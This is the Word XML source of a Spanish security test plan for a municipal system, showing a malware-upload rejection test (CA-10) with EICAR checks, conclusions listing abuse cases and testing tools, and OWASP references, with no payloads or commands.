          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc240017730"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-10 Carga de Documentos Maliciosos (Malware Upload)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="55FE5C13" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B2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Tabla 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F36CC" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B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  <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba de Seguridad CA-10 — Carga de Documentos Maliciosos (Malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upload)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9"/>
        <w:gridCol w:w="7427"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3E02BCF5" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E67E22"/>
          </w:tcPr>
          <w:p w14:paraId="3A85E72F" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
            <w:pPr>
              <w:jc w:val="center"/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Riesgo del Caso: ALTO  |  Probabilidad: Baja  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="521CD7DF" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00588B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A17D667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Objetivo de la Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="4F88E743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Verificar que el sistema rechaza archivos maliciosos en la carga de documentos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5C178F05" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A73B8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37925A6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Procedimiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="04A22950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Intentar subir archivos .exe, .php, DOCX con macro VBA y PDF con JavaScript embebido usando una cuenta de editor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2945B5A8" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="27AE60"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ED68C0F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Resultado Esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F8F1"/>
          </w:tcPr>
          <w:p w14:paraId="57C7DBBD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El sistema rechaza todos los archivos no permitidos con mensaje de error claro. Ningún archivo malicioso queda almacenado en el servidor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2845755C" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E67E22"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7256B942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s-CO"/>
              </w:rPr>
              <w:t>Criterio de Éxito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FEF9E7"/>
          </w:tcPr>
          <w:p w14:paraId="040E00E8" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787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sz w:val="20"/>
                <w:lang w:val="es-CO"/>
              </w:rPr>
              <w:t>Solo se aceptan extensiones de la lista blanca; el análisis antivirus detecta los archivos de prueba EICAR estándar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BB4234A" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="00677A69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BA91B2" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48741BE7" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc240017731"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Conclusiones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="295F3646" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas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b/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisitos de seguridad (RS-01 a RS-10): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Cubren autenticación MFA, cifrado AES-256/TLS 1.3, trazabilidad inmutable, protección DDoS, RBAC, firma digital, gestión de sesiones, validación de entradas, política de contraseñas y alertas SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B1EE9A" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas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b/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">10 Casos de Abuso identificados: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Desde amenazas internas (funcionario malicioso) hasta ataques externos (DDoS, SQLi, XSS, IDOR, Defacement, Malware Upload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B553F" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas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b/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Casos de Riesgo Crítico: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-01 (manipulación interna), CA-02 (DDoS electoral) y CA-05 (phishing de funcionario) requieren mitigación inmediata antes del despliegue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A240C8" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas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b/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Plan de Pruebas verificable: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>10 pruebas con procedimiento concreto, herramientas (SQLMap, JMeter, Hydra, Burp Suite) y criterio de éxito medible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C0BE6" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas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b/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Principio aplicado — Think like an attacker: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>El modelado de amenazas desde la perspectiva ofensiva permite fortalecer las defensas antes del despliegue, reduciendo el costo de remediación y protegiendo la confianza pública en la institución municipal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44816F30" w14:textId="68F4485C" w:rsidR="00677A69" w:rsidRDefault="00677A69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7E88E27C" w14:textId="6465B2EB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2C8DD596" w14:textId="5847AAC4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506F01C9" w14:textId="4DA45B07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354501AC" w14:textId="335DED11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355C66E4" w14:textId="34E3F7C5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28A50A39" w14:textId="5E85F563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5423B825" w14:textId="795C53D5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6608FDE6" w14:textId="02015393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07EFDAEA" w14:textId="17ADF271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073AA2B3" w14:textId="6F806675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2BE78C41" w14:textId="6CFC7180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2B9B3E2D" w14:textId="7DAD15CB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7429F797" w14:textId="090C5CF6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74A8C788" w14:textId="09FBA8DE" w:rsidR="00B03C14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1689F4E3" w14:textId="77777777" w:rsidR="00B03C14" w:rsidRPr="005765CC" w:rsidRDefault="00B03C14">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34936F5C" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B2">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc240017732"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Referencias</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="1723FDFB" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B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OWASP Foundation. (s.f.-a). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>. Recuperado el 10 de septiembre de 2026, de https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD34CB1" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B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OWASP Foundation. (s.f.-b). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>OWASP Web Security Testing Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>. Recuperado el 10 de septiembre de 2026, de https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000F5FF0" w:rsidSect="00034616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0690D" w14:textId="77777777" w:rsidR="007011B2" w:rsidRDefault="007011B2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1250674C" w14:textId="77777777" w:rsidR="007011B2" w:rsidRDefault="00701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EEA53" w14:textId="77777777" w:rsidR="007011B2" w:rsidRDefault="007011B2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6741876D" w14:textId="77777777" w:rsidR="007011B2" w:rsidRDefault="00701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0885D" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B2">
    <w:pPr>
      <w:pStyle w:val="Encabezad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noProof/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii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FF0"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="001C5B75"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00307BF1"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="004C1787"/>
    <w:rsid w:val="005765CC"/>
    <w:rsid w:val="00677A69"/>
    <w:rsid w:val="007011B2"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B03C14"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00BF6E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271D9"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{63AA2AF5-3295-4F53-9BA1-6F6E26A0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75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4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03C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03C1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03C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4143</Words>
  <Characters>22790</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>189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Computador 3 Planta de Producción</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2026-09-11T16:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-11T16:16:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>